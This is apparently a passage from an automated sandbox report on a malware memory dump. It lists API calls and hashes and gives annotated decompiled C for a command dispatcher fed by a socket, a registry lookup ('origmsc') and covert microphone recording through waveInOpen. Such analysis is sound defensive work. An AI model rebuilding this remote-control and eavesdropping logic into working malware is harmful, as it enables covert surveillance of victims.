                                    • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEA4
                                    • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEB4
                                    • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEC1
                                    • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AED3
                                    • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AEEB
                                    • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AEFD
                                    • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF18
                                    • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF2A
                                    • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF42
                                    • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF4B
                                    • Part of subcall function 0040AE6A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AF69
                                    • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040AF7B
                                    • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040AF88
                                    • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040AF95
                                    • Part of subcall function 004020F4: closesocket.WS2_32(0041BE70), ref: 004020F9
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AE56
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AE5F
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$?c_str@?$basic_string@$D@1@@G@std@@$?length@?$basic_string@G@2@@0@Hstd@@V12@V?$basic_string@$?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@FileG@1@@G@2@@std@@ModuleNameV01@V10@V10@0@V10@@closesocket
                                  • String ID:
                                  • API String ID: 1795822965-0
                                  • Opcode ID: 577d363030fa7591e52d31dd8c7d90d933b05a2efaa5bb55a7e707ed632d8bb6
                                  • Instruction ID: 48313c0a065dcb0dcea7f82e9129112a0e8bb123b90d7e9a0fd4ac289fd1d0c5
                                  • Opcode Fuzzy Hash: 577d363030fa7591e52d31dd8c7d90d933b05a2efaa5bb55a7e707ed632d8bb6
                                  • Instruction Fuzzy Hash: D3216271A0010DABCB04BBB5DD5A9EE3778EF44341F408569E922A71E1EF745604CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                  • malloc.MSVCRT ref: 00402175
                                  • recv.WS2_32(0041BE70,00000000,00000000,00000000), ref: 00402186
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8), ref: 0040219A
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                    • Part of subcall function 0040221E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,0041BE70,00000000), ref: 00402230
                                    • Part of subcall function 0040221E: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 00402248
                                    • Part of subcall function 0040221E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402257
                                    • Part of subcall function 0040221E: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402261
                                    • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040227A
                                    • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402283
                                    • Part of subcall function 0040221E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0040D2A6,0041BEA4), ref: 004022A2
                                    • Part of subcall function 0040221E: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004022C2
                                    • Part of subcall function 0040221E: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 004022DA
                                    • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 004022EC
                                    • Part of subcall function 0040221E: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,6B015DF0), ref: 00402302
                                    • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040230C
                                    • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402315
                                    • Part of subcall function 0040221E: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,0040D2A6), ref: 00402326
                                    • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402330
                                    • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402339
                                    • Part of subcall function 0040221E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040234D
                                  • free.MSVCRT(00000000,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021DB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??1?$basic_string@V01@$??0?$basic_string@??4?$basic_string@$D@1@@$??9std@@?substr@?$basic_string@D@2@@0@V12@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?length@?$basic_string@?size@?$basic_string@Y?$basic_string@freemallocrecv
                                  • String ID:
                                  • API String ID: 2200674315-0
                                  • Opcode ID: 533559aab0e3dcf38d7224a0014533e596ea9eed5f72da431cbdb498b9f83fa6
                                  • Instruction ID: 77ffb52b31aa9a22c106954051cf48487ac881783d2d7cd2d5b7dec6e0024f6e
                                  • Opcode Fuzzy Hash: 533559aab0e3dcf38d7224a0014533e596ea9eed5f72da431cbdb498b9f83fa6
                                  • Instruction Fuzzy Hash: 0221443250050DEBCB15EBA0DE49EDEB7B9FF94745B104029E902B21D1DBB56A05CB14
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 004124CD
                                  • time.MSVCRT ref: 004124E5
                                  • srand.MSVCRT ref: 004124F2
                                  • rand.MSVCRT ref: 00412506
                                  • rand.MSVCRT ref: 0041251A
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041252D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041253D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 00412546
                                  Strings
                                  • abcdefghijklmnopqrstuvwxyz, xrefs: 004124D5
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@rand$??1?$basic_string@D@1@@V01@V01@@Y?$basic_string@srandtime
                                  • String ID: abcdefghijklmnopqrstuvwxyz
                                  • API String ID: 3357298394-1277644989
                                  • Opcode ID: 15b0aad6ad470baee71e932c84e056877b09aa3be15cdb2110e7ae94f5adee03
                                  • Instruction ID: 712daf16f8b1022a6d974ed1f73c2a3049aadf137e9a4f533f5eb28a92ccc556
                                  • Opcode Fuzzy Hash: 15b0aad6ad470baee71e932c84e056877b09aa3be15cdb2110e7ae94f5adee03
                                  • Instruction Fuzzy Hash: F211A57754021DEBCB04EBA1ED49AEE7BB9EB80361F104026FD01E71D0DA759945CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                    • Part of subcall function 0040B9E8: RegOpenKeyExW.ADVAPI32(80000001,0040B9BA,00000000,00000002,0040B9BA,?,0040B9BA,80000001,00000000), ref: 0040B9F9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??1?$basic_string@$??0?$basic_string@$?begin@?$basic_string@?c_str@?$basic_string@D@1@@$?end@?$basic_string@?length@?$basic_string@G@1@@OpenV01@@
                                  • String ID: origmsc
                                  • API String ID: 643209241-68016026
                                  • Opcode ID: 494479129972e0f7fefba417d02f2ddae7ca3d57713fac6220985ed7839bb053
                                  • Instruction ID: bc2c983ee8b044bee8b0063c187639ee25001bfa26dad0cec207db0dad549837
                                  • Opcode Fuzzy Hash: 494479129972e0f7fefba417d02f2ddae7ca3d57713fac6220985ed7839bb053
                                  • Instruction Fuzzy Hash: 9111B17280050DEFCF04EFE0ED598DE77B9EA482557104025F912D31A0EB71AA59CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(?,00000000,6B03CB60,?,?,0041225E,?), ref: 00412919
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?,0041225E,?), ref: 00412937
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,0041225E,?), ref: 0041293F
                                  • ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000,?,?,0041225E,?), ref: 0041294A
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,0041225E,?), ref: 00412954
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 0041295D
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,0041225E,?), ref: 0041296C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 00412975
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@V01@@$?find@?$basic_string@?length@?$basic_string@?replace@?$basic_string@G@1@@V12@
                                  • String ID: ^"A
                                  • API String ID: 1083762089-1057680782
                                  • Opcode ID: 9915cc168a76eb8c27643a4995d50bfb89b5da52f4a242ec9541e0b2919b6f35
                                  • Instruction ID: 92156a76a3fbabd4be7b0d6bbce5c3b04c59df92facb318773be45834bd60316
                                  • Opcode Fuzzy Hash: 9915cc168a76eb8c27643a4995d50bfb89b5da52f4a242ec9541e0b2919b6f35
                                  • Instruction Fuzzy Hash: C201083650051EEFCF049F64EC489ED3BB8FB84355B048564FC16972A0EB70AA55CF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 15%
                                  			E00411C4C(void* __eflags, intOrPtr _a4) {
                                  				char _v20;
                                  				void* _v36;
                                  				char _v52;
                                  				int _t21;
                                  				signed int _t35;
                                  				void* _t39;
                                  				void* _t45;
                                  				void* _t61;
                                  				void* _t62;
                                  				void* _t63;
                                  				void* _t64;
                                  				void* _t65;
                                  				intOrPtr _t67;
                                  				void* _t69;
                                  				void* _t71;
                                  				void* _t72;
                                  				void* _t75;
                                  
                                   				_t75 = __eflags;
                                   				_t67 = _a4; // per-command context passed in by the caller
                                   				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_t67 + 0x18); // copy the std::string (command text) stored at +0x18 of the context
                                   				_t21 = SetEvent( *(_t67 + 0x28)); // signal the event at +0x28: the command has been taken over, the producer may continue
                                   				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                   				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z(); // substring of the command (called with 4, see the API list below)
                                   				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                   				_t71 = _t69;
                                   				_t45 = _t71;
                                   				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                   				E004129EB(_t75,  &_v20,  &_v52, 0x41b310,  &_v52, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB); // split the command into tokens on the delimiter string at 0x41b310 (find/substr loop, see subcall 004129EB)
                                   				_t72 = _t71 + 0x24;
                                   				_t61 =  *_t21 - 0x61; // switch on one byte of the parsed command: first case value 0x61; the subtraction chain below tests the further cases 0x9e, 0xa2, 0xa5, 0xa6 and 0xa7 (the decompiler mis-attributes the byte to the SetEvent return value)
                                   				if(_t61 == 0) {
                                   					_push(E0040180C( &_v20, __eflags, 2)); // tokens 2, 1 and 0 of the split command
                                   					_push(E0040180C( &_v20, __eflags, 1));
                                   					_push(E0040180C( &_v20, __eflags, 0));
                                   					_push(_t72 - 0x10);
                                   					E00411D8A(E00412881(_t29)); // handler taking the three tokens
                                   				} else {
                                   					_t62 = _t61 - 0x3d;
                                   					if(_t62 == 0) {
                                   						E00411A24(_t45); // handler for case 0x9e, gets the substring built above
                                   					} else {
                                   						_t63 = _t62 - 4;
                                   						if(_t63 == 0) {
                                   							_t35 = E0040180C( &_v20, __eflags, 0); // token 0
                                   							__imp__??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z(0); // token0[0]
                                   							__eflags =  *_t35;
                                   							E00411B59(E0040180C( &_v20,  *_t35, 1), _t35 & 0xffffff00 | __eflags != 0x00000000); // handler(token 1, token0[0] != 0)
                                   						} else {
                                   							_t64 = _t63 - 3;
                                   							if(_t64 == 0) {
                                   								_t39 =  *0x41c1d4; // global event handle
                                   								__eflags = _t39;
                                   								if(_t39 != 0) {
                                   									SetEvent(_t39);
                                   								}
                                   							} else {
                                   								_t65 = _t64 - 1;
                                   								if(_t65 == 0) {
                                   									 *0x41c1d2 = 1; // global byte flag
                                   								} else {
                                   									if(_t65 == 1) {
                                   										 *0x41c1d3 = 1; // global byte flag
                                   									}
                                   								}
                                   							}
                                   						}
                                   					}
                                   				}
                                   				E004017DD( &_v20); // release the token list
                                   				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                   				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                   				return 0;
                                   			}

                                   Instruction addresses mapped to the listing above: 0x00411c4c through 0x00411d87

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411C5E
                                  • SetEvent.KERNEL32(?), ref: 00411C6D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00411C72
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 00411C8A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00411C9A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411CA9
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • SetEvent.KERNEL32(?), ref: 00411CF8
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000,00000000), ref: 00411D0A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411D73
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411D7C
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@V01@@$?length@?$basic_string@V12@$?substr@?$basic_string@Event$??4?$basic_string@?c_str@?$basic_string@?find@?$basic_string@A?$basic_string@D@1@@V01@
                                  • String ID:
                                  • API String ID: 3236006214-0
                                  • Opcode ID: 76bb0f9787f4f843399319169ef794d69e049009073b19e53c3a0fe976d13f89
                                  • Instruction ID: c36b53e32b237951d30ffea7710e320f728efbc531e2b869315b9cf17b3ebb74
                                  • Opcode Fuzzy Hash: 76bb0f9787f4f843399319169ef794d69e049009073b19e53c3a0fe976d13f89
                                  • Instruction Fuzzy Hash: 5431D872A502089FDB14FBB5EC4AAFE7778FF54300F00442AE502A31F1EA786984CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 47%
                                  			E00401519(WCHAR* __eax, void* __eflags) {
                                  				char* _t4;
                                  				signed int _t5;
                                  				CHAR* _t10;
                                  				signed int _t11;
                                  				signed int _t19;
                                  				signed int _t20;
                                  				intOrPtr* _t26;
                                  				void* _t27;
                                  
                                  				_t27 = __eflags;
                                   				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                   				CreateDirectoryW(__eax, 0); // create the output directory for the recordings (wide path passed in EAX)
                                   				// WAVEFORMATEX at 0x41b218: 8 kHz, 8-bit, mono PCM
                                   				0x41b218->wFormatTag = 1; // WAVE_FORMAT_PCM
                                   				 *0x41b21a = 1; // nChannels
                                   				 *0x41b21c = 0x1f40; // nSamplesPerSec = 8000
                                   				 *0x41b226 = 8; // wBitsPerSample
                                   				 *0x41b220 = 0x1f40; // nAvgBytesPerSec = 8000
                                   				 *0x41b224 = 1; // nBlockAlign
                                   				 *0x41b228 = 0; // cbSize
                                   				_t4 = E0040180C(0x41bcb0, _t27, 0x24); // config entry 0x24: recording length in minutes
                                   				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                   				_t5 = atoi(_t4);
                                   				_t19 =  *0x41b21c; // 0x0
                                   				 *_t26 = 0x30008; // CALLBACK_FUNCTION | WAVE_FORMAT_DIRECT: most plausibly the fdwOpen argument the decompiler could not attach to the waveInOpen call below
                                   				_t20 = _t19 * _t5 * 0x3c; // samples = nSamplesPerSec * minutes * 60
                                   				 *0x41b1d0 = _t20;
                                   				 *0x41b1d8 = (( *0x41b226 & 0x0000ffff) >> 3) * _t20; // bytes = (wBitsPerSample / 8) * samples
                                   				_t10 = waveInOpen(0x41b210, 0xffffffff, 0x41b218, E00401640, 0, ??); // device WAVE_MAPPER (-1), callback E00401640
